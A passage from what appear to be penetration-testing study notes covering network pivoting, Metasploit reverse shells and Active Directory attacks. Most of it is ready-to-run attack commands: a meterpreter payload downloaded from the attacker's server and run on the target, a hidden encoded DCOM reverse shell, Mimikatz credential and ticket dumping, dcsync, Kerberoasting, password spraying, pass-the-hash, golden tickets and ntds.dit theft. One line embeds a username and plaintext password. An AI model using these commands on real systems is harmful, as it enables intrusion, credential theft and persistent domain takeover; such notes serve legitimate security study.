1037 | KALI ---SSH--- WINDOWS-1 ---RDP--- WINDOWS-2
1038 |  |________________RDP__________________|
1039 | 
1040 | ```
1041 | 
1042 | A simple plink Remote Forwaring is the following
1043 | 
1044 |  ```powershell
1045 | C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:<LOCAL-PORT>:127.0.0.1:<REMOTE-PORT> <KALI-IP>
1046 |  ```
1047 | 
1048 | ### NETSH
1049 | From the Microsoft documentation: "Netsh is a command-line scripting utility that allows you to display or modify the network configuration of a computer that is currently running. Netsh commands can be run by typing commands at the netsh shell and be used in batch files or scripts. Remote computers and the local computer can be configured by using netsh commands. 
1050 | First we must add the interface proxy with
1051 | 
1052 | ```powershell
1053 | netsh interface portproxy add v4tov4 listenport=<LOCA-PORT> listenaddress=<LOCAL-IP> connectport=<REMOTE-PORT> connectaddress=<REMOTE-IP>
1054 | ```
1055 | 
1056 | To show the status of the proxy
1057 | 
1058 | ```powershell
1059 | netsh interface portproxy show all
1060 | ```
1061 | 
1062 | We must allow the firewall rule to open a port in order to use the proxy. For this reason netsh requires Administrator privileges.
1063 | 
1064 | ```powershell
1065 | netsh advfirewall firewall add rule name="port_forward_ssh_PORT" protocol=TCP dir=in localip=<LOCAL-IP> localport=<LOCAL-PORT> action=allow
1066 | ```
1067 | 
1068 | Now, querying the LOCAL-IP with a connection, will connect the Kali machine to the REMOTE-IP on the REMOTE-PORT. At the end of the attack we should restore the firewall rules with
1069 | 
1070 | ```powershell
1071 | netsh advfirewall firewall delete rule name="port_forward_ssh_PORT"
1072 | netsh interface portproxy del v4tov4 listenport=<LOCAL-IP> listenaddress=<LOCAL-IP>
1073 | ```
1074 | 
1075 | ### CHISEL
1076 | [Chisel](https://github.com/jpillora/chisel) is an HTTP tunnel that forwards all the network connection through the HTTP protocol. It can be used combined with SSH to provide a good way to bypass firewalls that allows only Web traffic. Chisel uses a client/server model and binds the connection to the SOCKS port on the kali machine.
1077 | 
1078 | First we start chisel `SERVER` executable. It can happen that the target doesn't have the chisel executable. In this case we must provide it first.
1079 | 
1080 |  ```bash
1081 | chisel server --port <LOCAL-PORT> --reverse
1082 | ```
1083 | 
1084 | On the `CLIENT` we must bind the connection with the server. The R specifies SOCKS reverse tunneling that bounds on port 1080 on the kali machine by default (`ss -ntplu` to check the bind status)
1085 | 
1086 | ```bash
1087 | /tmp/chisel client <KALI-IP>:<LOCAL-PORT> R:socks > /dev/null 2>&1 &
1088 |  ```
1089 | 
1090 | Now, on the server we can navigate through the chisel tunnel with HTTP connection. We specify the ProxyCommand option that is the SSH option to specify a SOCKS5 connection and we use ncat, a modified version of netcat that accepts a SOCKS5 connection.
1091 | 
1092 | ```bash
1093 | ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' user@<REMOTE-IP>
1094 | ```
1095 | 
1096 | Alternately we can use proxychains bound on `127.0.0.1` on port `1080`. This is an example with smbclient.
1097 | 
1098 | ```bash
1099 | proxychains smbclient -L \\<REMOTE-IP>
1100 | ```
1101 | 
1102 | ## DNS Exfiltration and DNS Tunneling
1103 | DNS tunneling takes advantage of this fact by using DNS requests to implement a command and control channel for malware. Inbound DNS traffic can carry commands to the malware, while outbound traffic can exfiltrate sensitive data or provide responses to the malware operator’s requests. This works because DNS is a very flexible protocol. There are very few restrictions on the data that a DNS request contains because it is designed to look for domain names of websites. Since almost anything can be a domain name, these fields can be used to carry sensitive information. These requests are designed to go to attacker-controlled DNS servers, ensuring that they can receive the requests and respond in the corresponding DNS replies.
1104 | 
1105 | ### DNSCAT2
1106 | With [dnscat](https://github.com/iagox86/dnscat2) we can use DNS as a tunnel and forward all traffic with DNS requests from one host, to connect a WAN host to an host deep and protected in the internal LAN. The **WAN-HOST** will query the **IP-B** through the DNS tunnel that **IP-A** enstabilish with **WAN-HOST**, using **IP-C** as a resolver.
1107 | 
1108 | ```
1109 |                 DNS ------IP-C
1110 |                  |     
1111 | WAN-HOST ----- IP-A ------IP-B
1112 |    |____________||__________|
1113 | 
1114 | ```
1115 | 
1116 | On the internal host, after we gain access to it, we run
1117 | 
1118 | ```bash
1119 | ./dnscat <DOMAIN>
1120 | ```
1121 | 
1122 | And on the host in the WAN we run
1123 | 
1124 | ```bash
1125 | dnscat2-server <DOMAIN>
1126 | ```
1127 | 
1128 | Where the **DOMAIN** is a domain that can be resolved in the LAN. Now on the server we can interact with the tunnel created 
1129 | 
1130 | ```bash
1131 | window -i 1
1132 | ```
1133 | 
1134 | And run the command that forwards the **LOCAL-PORT** to the **REMOTE-INTERNAL-IP** using the **REMOTE-PORT**
1135 | 
1136 | ```bash
1137 | listen 127.0.0.1:<LOCAL-PORT> <REMOTE-INTERNAL-IP>:<REMOTE-PORT>
1138 | ```
1139 | 
1140 | Now on the WAN host we can query the **REMOTE-INTERNAL-IP** using the tunnel, with a connection that points to **LOCAL-PORT**
1141 | 
1142 | ```bash
1143 | ssh user@127.0.0.1 -p <LOCAL-PORT>
1144 | ```
1145 | 
1146 | ## Metasploit
1147 | [Offsec's Metasploit Page](https://www.offsec.com/metasploit-unleashed/) has a very good guide for Metasploit usage.
1148 | 
1149 | ## Staged Reverse Shell
1150 | We create the staged executables that we will transfer on the targets
1151 | 
1152 | ```bash
1153 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o met.exe
1154 | ```
1155 | 
1156 | And in msfconsole we start the listener
1157 | 
1158 | ```bash
1159 | sudo msfconsole -q
1160 | use multi/handler
1161 | set payload windows/x64/meterpreter/reverse_tcp
1162 | set LHOST <HOST-IP>
1163 | set LPORT <PORT>
1164 | set ExitOnSession false
1165 | run -j
1166 | ```
1167 | 
1168 | We start the python server to serve the exploit on the machine
1169 | 
1170 | ```bash
1171 | python3 -m http.server <PORT>
1172 | ```
1173 | 
1174 | On the target we download the file and we run the executable
1175 | 
1176 | ```powershell
1177 | iwr -uri http://<HOST-IP>:<PORT>/met.exe -Outfile met.exe
1178 | .\met.exe
1179 | ```
1180 | 
1181 | ### Oneliner Listener
1182 | We can use metasploit also via oneliner commands
1183 | 
1184 | ```bash
1185 | msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST>;set LPORT <LPORT>;run;"
1186 | ```
1187 | 
1188 | ## Autoroute and Proxy
1189 | Metasploit can also help us with port forwarding. We can set up the `autoroute module`
1190 | 
1191 | ```bash
1192 | use multi/manage/autoroute
1193 | set session <SESSION>
1194 | run
1195 | ```
1196 | 
1197 | And then we start the socks proxy
1198 | 
1199 | ```bash
1200 | use auxiliary/server/socks_proxy
1201 | set SRVHOST 127.0.0.1
1202 | set SRVPORT 1080
1203 | set VERSION 5
1204 | run -j
1205 | ```
1206 | 
1207 | In this way all the traffic routed through the exploited machine will be redirected in our 127.0.0.1, port 1080. With proxychains we can run command thorugh the proxy and enumerate the internal network
1208 | 
1209 | ```bash
1210 | proxychains nmap -sT -oN -p 80 192.168.1.0/24 
1211 | ```
1212 | 
1213 | ## Active Directory
1214 | A directory is a hierarchical structure that stores information about objects on the network. A directory service, such as Active Directory Domain Services (AD DS), provides the methods for storing directory data and making this data available to network users and administrators. For example, AD DS stores information about user accounts, such as names, passwords, phone numbers, and so on, and enables other authorized users on the same network to access this information.
1215 | 
1216 | Active Directory stores information about objects on the network and makes this information easy for administrators and users to find and use. Active Directory uses a structured data store as the basis for a logical, hierarchical organization of directory information.
1217 | List users in domain
1218 | 
1219 | ## Active Directory Mindmap
1220 | A very useful mindmap for Active Directory is the following (credits: [https://orange-cyberdefense.github.io](https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg))
1221 | ![image](img/mindmap_ad_dark_classic_2025.03.excalidraw.svg)
1222 | 
1223 | ```powershell
1224 | net user /domain
1225 | ```
1226 | 
1227 | Enumerate user in domain
1228 | 
1229 | ```powershell
1230 | net user <USER> /domain
1231 | ```
1232 | 
1233 | List groups in domain
1234 | 
1235 | ```powershell
1236 | net group /domain
1237 | ```
1238 | 
1239 | Enumerate group in domain
1240 | 
1241 | ```powershell
1242 | net group <GROUP> /domain
1243 | ```
1244 | 
1245 | ### Active Directory Enumeration
1246 | The AD enumeration is a crucial part to get the informations on what is running on the systems joined in the AD network, along with the users and groups. We can use basic .NET functions or directly, if we can download or transfer programs on the machine, use some automated tools.
1247 | 
1248 | ### CMD Enumeration
1249 | [Basic Win CMD for Pentesters](https://book.hacktricks.xyz/windows-hardening/basic-cmd-for-pentesters#domain-info)
1250 | 
1251 | ### Nice to know: PowerView
1252 | PowerView is a very useful tool to enumerate many things in the windows machine and the domain. [Here](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) there are some useful tricks with it.
1253 | 
1254 | ### Swiss Army Knife: WADComs
1255 | [WADComs](https://wadcoms.github.io/) is a userful tool that gives you an overview of what you have and what you can do with the things that you have.
1256 | 
1257 | ### PowerSploit
1258 | [PowerSploit](https://powersploit.readthedocs.io/en/latest/Recon/) is a useful tool that can be used to perform automatic enumeration. It has to be loaded in the system with
1259 | 
1260 | ```powershell
1261 | powershell -ep bypass
1262 | Import-Module .\PowerSploit.ps1
1263 | ```
1264 | 
1265 | Domain enumeration
1266 | 
1267 | ```powershell
1268 | Get-NetDomain
1269 | ```
1270 | 
1271 | User enumeration
1272 | 
1273 | ```powershell
1274 | Get-NetUser
1275 | ```
1276 | 
1277 | Groups enumeration
1278 | 
1279 | ```powershell
1280 | Get-NetGroup
1281 | ```
1282 | 
1283 | Get Access Control Entries
1284 | 
1285 | ```powershell
1286 | Get-ObjectAcl -Identity <USERNAME>
1287 | ```
1288 | 
1289 | Convert SID to name
1290 | 
1291 | ```powershell
1292 | Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
1293 | ```
1294 | 
1295 | Filter Identities for GenericAll ACL
1296 | 
1297 | ```powershell
1298 | Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
1299 | ```
1300 | 
1301 | Get-ObjectAcl -Identity stephanie
1302 | 
1303 | Enumerate object in the domain, selecting the operating system
1304 | 
1305 | ```powershell
1306 | Get-NetComputer | select operatingsystem
1307 | ```
1308 | 
1309 | To enumerate the machines in the domain with Admin access for our user
1310 | 
1311 | ```powershell
1312 | Find-LocalAdminAccess
1313 | ```
1314 | 
1315 | We can confirm it via
1316 | 
1317 | ```powershell
1318 | Get-NetSession -ComputerName <COMPUTER-NAME>
1319 | ```
1320 | 
1321 | Enumerate Service Principal Names
1322 | 
1323 | ```powershell
1324 | Get-NetUser -SPN | select samaccountname,serviceprincipalname
1325 | ```
1326 | 
1327 | Or with a builtin tool
1328 | 
1329 | ```powershell
1330 | setspn -L <SERVICE-NAME>
1331 | ```
1332 | 
1333 | ### PsLoggedon
1334 | [PsLoggedon](https://learn.microsoft.com/it-it/sysinternals/downloads/psloggedon) is a useful tool that checks (if we have the right privileges) the other user sessions in the other systems of the domain.
1335 | 
1336 | ```powershell
1337 | .\PsLoggedon.exe \\<COMPUTER-NAME>
1338 | ```
1339 | 
1340 | ### SharpHound and BloodHound
1341 | The [https://github.com/BloodHoundAD](https://github.com/BloodHoundAD/) utils are very useful in the AD enumeration for gathering informations about logged on users, and general data collection. `In order to perform succesful enumeration remember to download the right versions of the tools.`
1342 | If we are using BloodHound v4.3.1 we must use the relative SharpHound v4.3.1, otherwise this will not work and the import of the audit.zip will be stuck at 0%. Under Collectors/SharpHound.ps1 we can find the correct version supported from the current BloodHound build.
1343 | 
1344 | #### [SharpHound](https://github.com/BloodHoundAD/SharpHound)
1345 | SharpHound is used for the data collection part.
1346 | 
1347 | We first import it with
1348 | 
1349 | ```powershell
1350 | Import-Module .\SharpHound.ps1
1351 | ```
1352 | 
1353 | And we run the script, saving information in a ZIP file for easy transfer in our <PATH>
1354 | 
1355 | ```powershell
1356 | Invoke-BloodHound -CollectionMethod All -OutputDirectory <PATH> -OutputPrefix "audit"
1357 | ```
1358 | 
1359 | For a SMB enumeration we can list the shares and check if we can access them
1360 | 
1361 | ```powershell
1362 | Find-DomainShare
1363 | ```
1364 | 
1365 | If in the sares we find some old credentials, encrypted with AES-256 we can decrypt it in the kali machine with
1366 | 
1367 | ```powershell
1368 | gpp-decrypt <CREDENTIALS>
1369 | ```
1370 | 
1371 | #### [BloodHound](https://github.com/BloodHoundAD/BloodHound)
1372 | Is a useful graphical interface for printing the SharpHound retrieved data. It can print various information and make a diagram on what victim target first to gain AD Admin access. Here we can list users groups, sessions etc. The element displayed with the full SID are local object of the machines.
1373 | 
1374 | A useful RAW query to list all computer in a domain is the following
1375 | 
1376 | ```script
1377 | MATCH(m:Computer) RETURN m
1378 | ```
1379 | 
1380 | To list all users
1381 | 
1382 | ```script
1383 | MATCH(m:User) RETURN m
1384 | ```
1385 | 
1386 | Find active session for users and bind them to the computer
1387 | 
1388 | ```script
1389 | MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
1390 | ```
1391 | 
1392 | Delete data from Neo4J
1393 | 
1394 | ```script
1395 | match (a) -[r] -> () delete a, r
1396 | match (a) delete a
1397 | ```
1398 | 
1399 | # Active Directory Authentication
1400 | 
1401 | ## NTLM
1402 | <!-- https://www.crowdstrike.com/cybersecurity-101/ntlm-windows-new-technology-lan-manager/ -->
1403 | Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users’ identity and protect the integrity and confidentiality of their activity. At its core, NTLM is a single sign on (SSO) tool that relies on a challenge-response protocol to confirm the user without requiring them to submit a password. Despite known vulnerabilities, NTLM remains widely deployed even on new systems in order to maintain compatibility with legacy clients and servers. While NTLM is still supported by Microsoft, it has been replaced by Kerberos as the default authentication protocol in Windows 2000 and subsequent Active Directory (AD) domains. 
1404 | 
1405 |     - The user shares their username, password and domain name with the client.
1406 |     - The client develops a scrambled version of the password — or hash — and deletes the full password.
1407 |     - The client passes a plain text version of the username to the relevant server.
1408 |     - The server replies to the client with a challenge, which is a 16-byte random number.
1409 |     - In response, the client sends the challenge encrypted by the hash of the user’s password.
1410 |     - The server then sends the challenge, response and username to the domain controller (DC).
1411 |     - The DC retrieves the user’s password from the database and uses it to encrypt the challenge.
1412 |     - The DC then compares the encrypted challenge and client response. If these two pieces match, then the user is authenticated and access is granted.
1413 | 
1414 |  <p align="center">
1415 |   <img src="img/ntlm.png" />
1416 | </p>
1417 | 
1418 |  
1419 | ## Kerberos
1420 | <!-- https://www.fortinet.com/it/resources/cyberglossary/kerberos-authentication -->
1421 | Kerberos authentication is currently the default authorization technology used by Microsoft Windows. It provides a credible security solution for businesses of all sizes. 
1422 | Kerberos uses symmetric key cryptography and a key distribution center (KDC) to authenticate and verify user identities. A KDC involves three aspects:
1423 | 
1424 |     - A ticket-granting server (TGS) that connects the user with the service server (SS)
1425 |     - A Kerberos database that stores the password and identification of all verified users 
1426 |     - An authentication server (AS) that performs the initial authentication 
1427 | 
1428 | During authentication, Kerberos stores the specific ticket for each session on the end-user's device. Instead of a password, a Kerberos-aware service looks for this ticket. Kerberos authentication takes place in a Kerberos realm, an environment in which a KDC is authorized to authenticate a service, host, or user. 
1429 | 
1430 | Kerberos authentication is a multistep process that consists of the following components: 
1431 | 
1432 |     - The client who initiates the need for a service request on the user's behalf 
1433 |     - The server, which hosts the service that the user needs access to
1434 |     - The AS, which performs client authentication. If authentication is successful, the client is issued a ticket-granting ticket (TGT) or user authentication token, which is proof that the client has been authenticated. 
1435 |     - The KDC and its three components: the AS, the TGS, and the Kerberos database
1436 |     - The TGS application that issues service tickets 
1437 |     
1438 |  <p align="center">
1439 |   <img src="img/kerberos.png" />
1440 | </p>
1441 | 
1442 | ## Get tickets and passwords with Mimikatz
1443 | In modern versions of Windows the user hashes are stored in the Local Security Authority Subsystem Service or [LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)
1444 | We can dump sensitive informations about accesses with Mimikatz. We can run Mimikatz with
1445 | 
1446 | ```powershell
1447 | .\mimikatz.exe
1448 | ```
1449 | 
1450 | We can use logonpasswords to dump hashed for all users logged on to the current workstation or server
1451 | 
1452 | ```powershell
1453 | privilege::debug
1454 | sekurlsa::logonpasswords
1455 | ```
1456 | 
1457 | Once we've executed the directory listing on a SMB share or we use another ticket-based-service, we can use Mimikatz to show the tickets that are stored in memory by entering
1458 | 
1459 | ```powershell
1460 | privilege::debug
1461 | sekurlsa::tickets
1462 | ```
1463 | 
1464 | ### [Kerberos attacks cheatsheet](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a)
1465 | 
1466 | ## Password Attack
1467 | We can do various password attacks on the Windows AD to get the user access credentials
1468 | 
1469 | ### [PasswordSpray.ps1](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
1470 | It is a powershell script that tries the passwords for all users in the domain, that has to be launched inside an AD-joined machine.
1471 | 
1472 | 
1473 | ```powershell
1474 | .\Spray-Passwords.ps1 -Pass <PASSWORD>
1475 | ```
1476 | 
1477 | ### [Kerbrute](https://github.com/ropnop/kerbrute)
1478 | From a Linux machine instead we can run AD password attack with Kerbrute. We can use this script also from a Window machine joined in the domain.
1479 | 
1480 | ```bash
1481 | ./kerbrute_linux_amd64 passwordspray -d <DOMAIN> domain_users.txt <PASSWORD>
1482 | ```
1483 | 
1484 | Kerbrute can be used also to get a list of users, if the machine is vulnerable to as-rep roasting. Search for valid user without credentials with the following
1485 | 
1486 | ```bash
1487 | kerbrute userenum -d <DOMAIN> usernames.txt
1488 | ```
1489 | 
1490 | or
1491 | 
1492 | ```bash
1493 | kerbrute -domain <DOMAIN> -users users.txt -dc-ip <IP>
1494 | ```
1495 | 
1496 | ### [Crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
1497 | Crackmapexec is a tool for password spraying in the Active Directory network. It can be used for example against the SMB service with
1498 | 
1499 | ```bash
1500 | crackmapexec smb <IP> -u users -p '<PASSWORD>' -d <DOMAIN> --continue-on-success
1501 | ```
1502 | 
1503 | List access for shares in the domain for the users in users.txt with passwords passwords.txt
1504 | 
1505 | ```bash
1506 | crackmapexec smb <IP> -u users.txt -p passwords.txt --shares
1507 | ```
1508 | 
1509 | Run crackmapexec through a proxy (eg chisel) and performing a **local authentication** (No Active Directory Authentication)
1510 | 
1511 | proxychains crackmapexec smb <IP> -u users.txt -p 'PASSWORD' --continue-on-success --local-auth
1512 | 
1513 | Run crackmapexec and dump [LAPS](https://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/) passwords
1514 | 
1515 | ```bash
1516 | crackmapexec ldap 192.168.219.122 -u fmcsorley -p CrabSharkJellyfish192 --kdcHost 192.168.219.122 -M laps
1517 | ```
1518 | 
1519 | Run crackmapesec to against mssql
1520 | 
1521 | ```bash
1522 | crackmapexec mssql -d <DOMAIN> -u <username> -p <password> -x "whoami"
1523 | ```
1524 | 
1525 | ### LDAP
1526 | First we run nmap agains ldap server
1527 | 
1528 | ```bash
1529 | nmap --script "ldap* and not brute" $ip -p 389 -v -Pn -sT <IP>
1530 | ```
1531 | 
1532 | Then using ldapsearch we can extract credentials. The -b parameter in the ldapsearch command specifies the base DN (Distinguished Name) for the search. The DN is essentially the starting point in the LDAP directory tree from which the search will begin. Think of it as the root of your search within the LDAP structure. Example taken from [here](https://medium.com/@0xrave/kyoto-proving-grounds-practice-walkthrough-active-directory-820dfcff5ddd).
1533 | 
1534 | ```bash
1535 | ldapsearch -x -h <IP> -b "dc=X,dc=Y"
1536 | ```
1537 | 
1538 | ### AS-REP Roasting
1539 | If the AD authentication is configured without the Kerberos Preauthentiction enabled<!-- https://medium.com/r3d-buck3t/kerberos-attacks-as-rep-roasting-2549fd757b5 -->, any user can request a TGT. We can use the `impacket-GetNPUsers` util on Kali. A good explaination of this attack can be found [here](https://en.hackndo.com/kerberos-asrep-roasting/).
1540 | 
1541 | ```bash
1542 | impacket-GetNPUsers -dc-ip <IP-DC>  -request -outputfile hashes.asreproast corp.com/<USER>
1543 | ```
1544 | 
1545 | AS-Rep roasting tickets (TGT) has this format: `$krb5asrep$23$`.
1546 | 
1547 | In the powershell the specular program is [Rubeus](https://github.com/GhostPack/Rubeus)
1548 | 
1549 | ```powershell
1550 | .\Rubeus.exe asreproast /nowrap
1551 | ```
1552 | 
1553 | In both cases we have to know at leas the password of one of the AD users. For this reason this and the following tecniques are **post-exploitation** attacks. When we gain the hash it can be cracked with hashcat.
1554 | 
1555 | ```bash
1556 | sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
1557 | ```
1558 | 
1559 | ### Kerberoasting
1560 | With kerberoasting we are requesting SPN's TGS to the DC. The user that can access the service, for the Windows AD design, can access also the SPN and then the TGS, in order to use the service. We will abuse a service ticket in order to crack the password of the service account. We can run the attack from Rubeus with a user in the AD, and will be targeted only the **Service Principal Names** linked to the account user.
1561 | 
1562 | From the Kali machine we can run the attack with 
1563 | 
1564 | ```bash
1565 | sudo impacket-GetUserSPNs -request -dc-ip <DC-IP> corp.com/<USER>
1566 | ```
1567 | 
1568 | The `-request` flag is requesting the DC a TGS for every SPN the logged user has access to. Dumping the tickets could let us to the password because it contains password of the SPN in hash.
1569 | The TGS ticket will begin with this format: `$krb5tgs$23$`.
1570 | 
1571 | From the Windows machine we can use Rubeus
1572 | 
1573 | ```powershell
1574 | .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
1575 | ```
1576 | 
1577 | Again now we copy the hash and we crack it with hashat with the Kerberos code
1578 | 
1579 | ```bash
1580 | sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt --force
1581 | ```
1582 | 
1583 | ### Creating silver tickets
1584 | We can use Mimikatz to dump hashes and craft a ticket for services access.
1585 | 
1586 | First we take the DOMAIN SID with
1587 | 
1588 | ```powershell
1589 | whoami /user
1590 | ```
1591 | We extract the domain
1592 | 
1593 | ```txt
1594 | corp\user **S-1-5-21-xxxxxxxx-xxxxxxx-xxxxxxxx**-xxxx
1595 | ```
1596 | 
1597 | Then with Mimikatz we dump service hashes
1598 | 
1599 | ```powershell
1600 | privilege::debug
1601 | sekurlsa::logonpasswords
1602 | ```
1603 | 
1604 | Here we take the NTLM HASH of the service, for example the `iss_service`. Next we can run the attack inside Mimikatz. In the following case we will target the ISS Microsoft service.
1605 | 
1606 | ```powershell
1607 | kerberos::golden /sid:<SID> /domain:<DOMAIN> /ptt /target:<TARGET> /service:http /rc4:<HASH> /user:<USER>
1608 | ```
1609 | 
1610 | Now we can dump our tickets with
1611 | 
1612 | ```powershell
1613 | klist
1614 | ```
1615 | 
1616 |  The ticket will be crated for the admin user and for the local user. We can craft authenticated request to the ISS server.
1617 | 
1618 | ```powershell
1619 | iwr -UseDefaultCredentials <URL>
1620 | ```
1621 | 
1622 | ### Domain Controller Synchronization
1623 | When the AD has to synchronize the domains, it runs the Directory Replication Service (DRS) Remote Protocol. Because the domain doesnpt verify the origin of the request, we can perform a **dcsync** attack that could dump any user credential in the domain. We can use the `impacket-secretsdump` utility. First we run Mimikatz with the dsync attack.
1624 | 
1625 | ```powershell
1626 | lsadump::dcsync /domain:<DOMAIN> /user:Administrator
1627 | ```
1628 | 
1629 | We crack the NTLM HASH with hashcat
1630 | 
1631 | ```powershell
1632 | hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt --force
1633 | ```
1634 | ## Lateral Movement in Active Directory
1635 | Moving between AD Joined machines can be very powerful in order to execute various tasks. We can use many tools to connect to the machines.
1636 | 
1637 | ### WMIC
1638 | This is deprecated in new Windows versions, and must be Local Admin to run this command, but if we are we can run
1639 | 
1640 | ```powershell
1641 | wmic /node:<NODE-IP> /user:<USER> /password:<PASSWORD> process call create "calc"
1642 | ```
1643 | 
1644 | ### WINRS
1645 | Windows Remote Shell is command that needs the Domain Admin permission to be executed. WinRM is a built-in for WinRS
1646 | ```powershell
1647 | winrs -r:<NODE-IP> -u:<USER> -p:<PASSWORD>  "cmd /c hostname & whoami"
1648 | ```
1649 | 
1650 | ### Powershell WinRM capability
1651 | We can use WinRM directly in Powershell with the script
1652 | 
1653 | ```powershell
1654 | $username = '<USERNAME>';
1655 | $password = '<PASSWORD>';
1656 | $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
1657 | $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
1658 | New-PSSession -ComputerName <IP> -Credential $credential
1659 | ```
1660 | 
1661 | We can switch between PS WinRM sessions with
1662 | 
1663 | ```powershell
1664 | Enter-PSSession 1
1665 | ```
1666 | 
1667 | ### PsExec
1668 | PsExec is a good utility in the [SysInternals suite](https://learn.microsoft.com/en-us/sysinternals/downloads/). To use this we have to be Local Administrators and the ADMIN$ share must be exposed with File and Printer Sharing that has to be turned on. This, in the Windows AD machines is enabled by default. We can run PsExec with the following syntax.
1669 | 
1670 | ```powershell
1671 | ./PsExec64.exe -i  \\<MACHINE-IP> -u corp\<USER> -p <PASSWORD> cmd
1672 | ```
1673 | 
1674 | From the kali machine we can use **impacket-psexec** to run commands on Windows AD joined machines
1675 | 
1676 | ```bash
1677 | proxychains impacket-psexec <DOMAIN>/Administrator:'PASSWORD'@<IP>
1678 | ```
1679 | 
1680 | ### Pass the hash
1681 | If the server has SMB active and the Windows File and Printer Sharing feature to be enabled we can use the previously gained hash to authenticate has another user using only the hash. For this purpose we can use the `impacket-wmiexec` utility in Kali. This will not work in Kerberos authentication but can grant us the access to the system.
1682 | 
1683 | ```powershell
1684 | impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@<IP>
1685 | ```
1686 | 
1687 | ### Overpass the hash
1688 | We can abuse the hash to gain a full Kerberos TGT to gain then a TGS. To run this attack the credentials has to be cached and this means that in the machine there has to be a session for another user that executed some programs before us. Then we can rely on Mimikatz to get the cached hases. `The core concept of  this attack is to obtain functionant TGT Kerberos ticket without using the NTLM authentication actively over the network.`
1689 | 
1690 | ```powershell
1691 | privilege::debug
1692 | sekurlsa::logonpasswords
1693 | sekurlsa::pth /user:<USER> /domain:<ORG> /ntlm:<NTLM-HASH> /run:powershell
1694 | ```
1695 | In the new shell we can use
1696 | 
1697 | ```powershell
1698 | net use \\<SMB-SHARE>
1699 | klist
1700 | ```
1701 | 
1702 | To list all tickets. If we don't use some authentication before, we will not have any tickets because this is a new session.
1703 | 
1704 | We can now use `PsExec` to perform a lateral movement on the user we impersonated before
1705 | 
1706 | ```powershell
1707 | .\PsExec.exe \\files04 cmd
1708 | ```
1709 | 
1710 | **In this way we can convert a NTLM hash in a TGT and we can use tools like PsExec to authenticate in another Windows machine with the TGT ticket. **
1711 | 
1712 | ### Pass the ticket
1713 | If a TGT ticket stays for the machine it was created for, but a TGS can be used in more ways. Here the TGS is reused to authenticate over the network and if the ticket belong to the current user, no Admin privilege is required. Here again we have to gain a pre-existent session in the machine and we have to dump the hases and export them in the directory. This will create some `.kirbi` files that can be reimported for another user.
1714 | 
1715 | ```powershell
1716 | privilege::debug
1717 | sekurlsa::tickets /export
1718 | ```
1719 | 
1720 | This is the Mimikatz command to import a ticket inside the current user session
1721 | 
1722 | ```powershell
1723 | kerberos::ptt [0;12bd0]-0-0-xxxxxxxx-<USER>@<SERVICE>-<MACHINE>.kirbi
1724 | ```
1725 | 
1726 | Again with `klist` we can list our new tickets (the new one should appear) and we can use the ticket to enter the service the ticket was for.
1727 | 
1728 | ### DCOM
1729 | The Distributed Component Object Model can be used to perform lateral movement too. This is based on [COM](https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal?redirectedfrom=MSDN) and is used for inter-communication between computer on a network. DCOM needs RCP on the TCP port 135 to be executed and a local Admin access. It is based on the Microsoft Management Console. We can run a reverse shell with DCOM with
1730 | 
1731 | ```powershell
1732 | $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))
1733 | $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <REVSHELL-ENCODED>","7")
1734 | ```
1735 | 
1736 | On our attacker computer we must have a netcat listener active
1737 | 
1738 | ## Active Directory Persistence
1739 | After an exploit, to mantain a session once rebooted, changed credentials, etc.. we can craft custom golden tickets.
1740 | 
1741 | ### Golden Tickets
1742 | First we start Mimikatz to dump the NTLM HASH for the `krbtgt` account along with the Domain SID on the **exploited Domain Controller**.
1743 | 
1744 | ```powershell
1745 | privilege::debug
1746 | lsadump::lsa /patch
1747 | ```
1748 | 
1749 | Then we purge the credentials and craft the golden ticket for our current user, on the target machine, even if the machine is outside of the domain.
1750 | 
1751 | ```powershell
1752 | kerberos::purge
1753 | kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:S-1-5-21-xxxxxx-xxxxx-xxxxx /krbtgt:<HASH> /ptt
1754 | misc::cmd
1755 | ```
1756 | 
1757 | Now we have a golden ticket associated with the user session. Once the cmd shell is open we can run with `PsExec` the commands on the Domain Controller using our user that has the golden ticket.
1758 | 
1759 | ```powershell
1760 | PsExec.exe \\dc1 cmd.exe
1761 | ```
1762 | 
1763 | ### Shadow Copies
1764 | This is a Microsoft's backup technology to perform snapshots of data. The utility is [VShadow Tool and Sample](https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample). We run the command with
1765 | 
1766 | ```powershell
1767 | vshadow.exe -nw -p  C:
1768 | ```
1769 | 
1770 | We must save the shadow device name to reuse it when we save the backup on the C:\ disk.
1771 | 
1772 | ```powershell
1773 | copy \\?\GLOBALROOT\Device\<NAM>\windows\ntds\ntds.dit c:\ntds.dit.bak
1774 | ```
1775 | 
